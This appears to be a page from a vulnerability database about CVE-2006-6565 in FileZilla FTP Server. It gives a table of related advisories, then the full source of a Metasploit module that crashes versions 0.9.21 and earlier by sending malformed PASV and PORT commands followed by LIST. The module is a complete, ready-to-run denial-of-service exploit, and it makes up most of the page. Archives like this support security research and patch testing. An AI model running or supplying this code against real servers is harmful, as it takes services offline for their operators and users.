| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| FileZilla FTP Server < 0.9.22 Multiple Remote DoS | 12 Dec 200600:00 | – | nessus | |
| FileZilla FTP Server < 0.9.22 Wildcard Handling Remote DoS | 12 Dec 200600:00 | – | nessus | |
| CVE-2006-6565 | 29 May 201815:50 | – | circl | |
| CVE-2006-6565 | 15 Dec 200611:00 | – | cve | |
| CVE-2006-6565 | 15 Dec 200611:00 | – | cvelist | |
| FileZilla FTP Server Malformed PORT Denial of Service | 9 Jan 200905:33 | – | metasploit | |
| CVE-2006-6565 | 15 Dec 200611:28 | – | nvd | |
| FileZilla Server < 0.9.22 'Port Command' DoS Vulnerability | 2 Apr 201000:00 | – | openvas |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'FileZilla FTP Server Malformed PORT Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the FileZilla FTP
Server versions 0.9.21 and earlier. By sending a malformed PORT command
then LIST command, the server attempts to write to a NULL pointer.
},
'Author' => [ 'aushack' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '21542' ],
[ 'BID', '21549' ],
[ 'CVE', '2006-6565' ],
[ 'EDB', '2914' ],
[ 'OSVDB', '34435' ]
],
'DisclosureDate' => '2006-12-11'))
end
def run
begin
c = connect_login
rescue Rex::ConnectionRefused
print_error("Connection refused.")
return
rescue Rex::ConnectionTimeout
print_error("Connection timed out")
return
end
return if not c
send_cmd(['PASV', 'A*'], true) # Assigns PASV port
send_cmd(['PORT', 'A*'], true) # Rejected but seems to assign NULL to pointer
send_cmd(['LIST'], true) # Try and push data to NULL port, trigger crash :)
disconnect
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation